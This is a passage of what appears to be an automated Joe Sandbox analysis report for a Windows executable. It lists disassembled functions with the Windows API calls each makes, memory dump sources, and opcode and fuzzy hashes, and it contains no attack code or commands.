                                                                                                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 00A98D52
                                                                                                                                                                                                                                                                                                    • TerminateProcess.KERNEL32(00000000), ref: 00A98D59
                                                                                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(?,?,?,?), ref: 00A98F3A
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Process$CurrentFreeLibraryTerminate
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 146820519-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 9f0bd15bf6092e3c5b6110f3d2d81f18f9b6c5b5e871913b2ea4a0d2517e1078
                                                                                                                                                                                                                                                                                                    • Instruction ID: f42a0aee20734e2e9aa8c7552b69b09dc2c02294950dc8360787573d58ebdb4b
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9f0bd15bf6092e3c5b6110f3d2d81f18f9b6c5b5e871913b2ea4a0d2517e1078
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 85127A71A083019FCB14DF28C584B6ABBE5FF89314F14895DE8898B292DB35ED45CB92
                                                                                                                                                                                                                                                                                                    Function 00A99AF3 Relevance: 4.7, APIs: 3, Instructions: 233COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: _wcslen$_strcat
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 306214811-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 5bffd9bd6193104e79085fe75cbb97e6b5674f7f54467323ef3ab4f692eef9f2
                                                                                                                                                                                                                                                                                                    • Instruction ID: cc951da9e67a805cc96afd2b6a55328037a872e48e70e875ca2e3b0e6f521ba9
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5bffd9bd6193104e79085fe75cbb97e6b5674f7f54467323ef3ab4f692eef9f2
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D8A15931600615EFCB18DF58D5D19AABBF1FF49314B6084ADE84A8F692DB35ED42CB80
                                                                                                                                                                                                                                                                                                    Function 00A12793 Relevance: 4.7, APIs: 3, Instructions: 153comCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A1327E: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00A132AF
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A1327E: MapVirtualKeyW.USER32(00000010,00000000), ref: 00A132B7
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A1327E: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00A132C2
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A1327E: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00A132CD
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A1327E: MapVirtualKeyW.USER32(00000011,00000000), ref: 00A132D5
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A1327E: MapVirtualKeyW.USER32(00000012,00000000), ref: 00A132DD
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A13205: RegisterWindowMessageW.USER32(00000004,?,00A12964), ref: 00A1325D
                                                                                                                                                                                                                                                                                                    • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00A12A0A
                                                                                                                                                                                                                                                                                                    • OleInitialize.OLE32 ref: 00A12A28
                                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,00000000), ref: 00A53A0D
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 1986988660-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 4a592efc8fe72c6193754ff959e285f11b0ac08588c7292f14c96494c1703d7d
                                                                                                                                                                                                                                                                                                    • Instruction ID: 77ac431596d070582a352a7ab869913a8c4bebf13e54ed250fde9c120203f841
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4a592efc8fe72c6193754ff959e285f11b0ac08588c7292f14c96494c1703d7d
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3C719FB19112848ED798EFB9EEE57553BECFB49304740422AD059CF2A1EBB88443CF65
                                                                                                                                                                                                                                                                                                    Function 00A2FCAD Relevance: 4.6, APIs: 3, Instructions: 75timewindowCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A161A9: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00A16299
                                                                                                                                                                                                                                                                                                    • KillTimer.USER32(?,00000001,?,?), ref: 00A2FD36
                                                                                                                                                                                                                                                                                                    • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00A2FD45
                                                                                                                                                                                                                                                                                                    • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00A6FE33
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: IconNotifyShell_Timer$Kill
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 3500052701-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: b8d8703ce3f4f8e923917ff65491d3948e8a68c52a1ff06d44bc7842485ef5fe
                                                                                                                                                                                                                                                                                                    • Instruction ID: 4071957da3e8112215bb2d9013e30f97e7783c7b9c015e74f81faccd67040645
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b8d8703ce3f4f8e923917ff65491d3948e8a68c52a1ff06d44bc7842485ef5fe
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 12319571904354AFEB32CF249895BE6BBFC9B02308F0004AEE5DA97242D3742A85CB51
                                                                                                                                                                                                                                                                                                    Function 00A48A2E Relevance: 4.6, APIs: 3, Instructions: 61COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,00000000,?,?,00A4894C,?,00AD9CE8,0000000C), ref: 00A48A84
                                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,00A4894C,?,00AD9CE8,0000000C), ref: 00A48A8E
                                                                                                                                                                                                                                                                                                    • __dosmaperr.LIBCMT ref: 00A48AB9
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: CloseErrorHandleLast__dosmaperr
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 2583163307-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: af99a5574f410168f80dbcd0e74a10c44684bf824fcb9dfd8a6b7dc3e5814642
                                                                                                                                                                                                                                                                                                    • Instruction ID: d82603c3f67106f34249f056bab754de58ce12a940a8ddf14faef1763c7e626b
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: af99a5574f410168f80dbcd0e74a10c44684bf824fcb9dfd8a6b7dc3e5814642
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 25012B3AA051605BC6246374BD86B7E67454BC2BB4F3B053BF8149F1D2DFB8CD818291
                                                                                                                                                                                                                                                                                                    Function 00A4970B Relevance: 4.6, APIs: 3, Instructions: 50COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • SetFilePointerEx.KERNEL32(00000000,00000000,00000002,FF8BC369,00000000,FF8BC35D,00000000,1875FF1C,1875FF1C,?,00A497BA,FF8BC369,00000000,00000002,00000000), ref: 00A49744
                                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,00A497BA,FF8BC369,00000000,00000002,00000000,?,00A45ED4,00000000,00000000,00000000,00000002,00000000,FF8BC369,00000000,00A36F41), ref: 00A4974E
                                                                                                                                                                                                                                                                                                    • __dosmaperr.LIBCMT ref: 00A49755
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: ErrorFileLastPointer__dosmaperr
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 2336955059-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 6eb491a51c62f9244543bf23fd519d25daa73f437f9f2b53a8f8a0dc0501fcf1
                                                                                                                                                                                                                                                                                                    • Instruction ID: a7b84d790fa64ac762b3533a4e5b391f2be68d9001d3bca42495ee6e5c021688
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6eb491a51c62f9244543bf23fd519d25daa73f437f9f2b53a8f8a0dc0501fcf1
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AD012836630115AFCB159FA9DC46CAF3B29DBC5330B240219F8119B190EB309D51CB90
                                                                                                                                                                                                                                                                                                    Function 00A1F238 Relevance: 4.5, APIs: 3, Instructions: 29windowsleepCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • TranslateMessage.USER32(?), ref: 00A1F27B
                                                                                                                                                                                                                                                                                                    • DispatchMessageW.USER32(?), ref: 00A1F289
                                                                                                                                                                                                                                                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00A1F29F
                                                                                                                                                                                                                                                                                                    • Sleep.KERNEL32(0000000A), ref: 00A1F2B1
                                                                                                                                                                                                                                                                                                    • TranslateAcceleratorW.USER32(?,?,?), ref: 00A632D8
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Message$Translate$AcceleratorDispatchPeekSleep
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 3288985973-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: a8f5ad8a126deb04e3466e05fd897085ae2220a17a4ae698f12df47074d33b45
                                                                                                                                                                                                                                                                                                    • Instruction ID: 9d923389baaaf51f121e95d650bc83ba477b68c40ca8549d417b1e0f2fbcfd24
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a8f5ad8a126deb04e3466e05fd897085ae2220a17a4ae698f12df47074d33b45
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B5F05E316443859BEB34CBB0DC99FEA73ACAB45300F104929E64A970C0DB7495898B25
                                                                                                                                                                                                                                                                                                    Function 00A22B20 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 531COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • __Init_thread_footer.LIBCMT ref: 00A23006
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Init_thread_footer
                                                                                                                                                                                                                                                                                                    • String ID: CALL
                                                                                                                                                                                                                                                                                                    • API String ID: 1385522511-4196123274
                                                                                                                                                                                                                                                                                                    • Opcode ID: 7b5480dad2c915ad805b9a257021e27be5805544a42f706589e8b41779a5e476
                                                                                                                                                                                                                                                                                                    • Instruction ID: 718118f67463f60f0b1dc21e9778257d9db28548ae6314e0f14e107cc576c4d4
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7b5480dad2c915ad805b9a257021e27be5805544a42f706589e8b41779a5e476
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0E229C70608251EFDB14DF28D884B2ABBF1BF85314F24896DF4968B3A1D771E941CB92
                                                                                                                                                                                                                                                                                                    Function 00A21990 Relevance: 3.6, APIs: 2, Instructions: 643COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                    • Opcode ID: b8df10746b4c4529d06ecc8496142e980ef7c3284583c30cd4304b6f1f86d43c
                                                                                                                                                                                                                                                                                                    • Instruction ID: d83ad4d281be6ba9acb62b2c724a27786931d79d2ed8e62d3c85b6b0cdf0cb1f
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b8df10746b4c4529d06ecc8496142e980ef7c3284583c30cd4304b6f1f86d43c
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7732AC31A00215DFCB24EF68D991BAEB7B5FF25314F148568F815AB2A1E731ED80CB91
                                                                                                                                                                                                                                                                                                    Function 00A13A95 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 64COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetOpenFileNameW.COMDLG32(?), ref: 00A5413B
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A15851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00A155D1,?,?,00A54B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00A15871
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A13A57: GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 00A13A76
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Name$Path$FileFullLongOpen
                                                                                                                                                                                                                                                                                                    • String ID: X
                                                                                                                                                                                                                                                                                                    • API String ID: 779396738-3081909835
                                                                                                                                                                                                                                                                                                    • Opcode ID: 2d1daefd5bfdaef1a822342b0361783969542109d5dfe2b8b2d744d7f2903287
                                                                                                                                                                                                                                                                                                    • Instruction ID: b1bc532855369260478e712d60a71f49bf1d63f19d8fd197338d71acb4531595
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2d1daefd5bfdaef1a822342b0361783969542109d5dfe2b8b2d744d7f2903287
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C2219371A002589BCF05DF94C905BEE7BFCAF49314F00801AE545AB281DBB99A898F61
                                                                                                                                                                                                                                                                                                    Function 00A1396B Relevance: 3.1, APIs: 2, Instructions: 77windowCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00A13A3C
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: IconNotifyShell_
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 1144537725-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 3f8fe429ffea51021e69c0cf36132dc9f7377f99bc04559c90167378c3b1c2e5
                                                                                                                                                                                                                                                                                                    • Instruction ID: 7ca4426567e433ea97d14c707e436f1d635f306b93e1addd198456e65c470ed8
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3f8fe429ffea51021e69c0cf36132dc9f7377f99bc04559c90167378c3b1c2e5
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A6318E716047019FE720DF64D885797BBE8FF49308F00092EE6DA8B281E775A989CB52
                                                                                                                                                                                                                                                                                                    Function 00A1331B Relevance: 3.0, APIs: 2, Instructions: 30COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • IsThemeActive.UXTHEME ref: 00A1333D
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A132E6: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00A132FB
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A132E6: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00A13312
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A1338B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,?,?,00A13368,?), ref: 00A133BB
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A1338B: IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,00A13368,?), ref: 00A133CE
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A1338B: GetFullPathNameW.KERNEL32(00007FFF,?,?,00AE2418,00AE2400,?,?,?,?,?,?,00A13368,?), ref: 00A1343A
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A1338B: SetCurrentDirectoryW.KERNEL32(?,00000001,00AE2418,?,?,?,?,?,?,?,00A13368,?), ref: 00A134BB
                                                                                                                                                                                                                                                                                                    • SystemParametersInfoW.USER32(00002001,00000000,00000002,?), ref: 00A13377
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
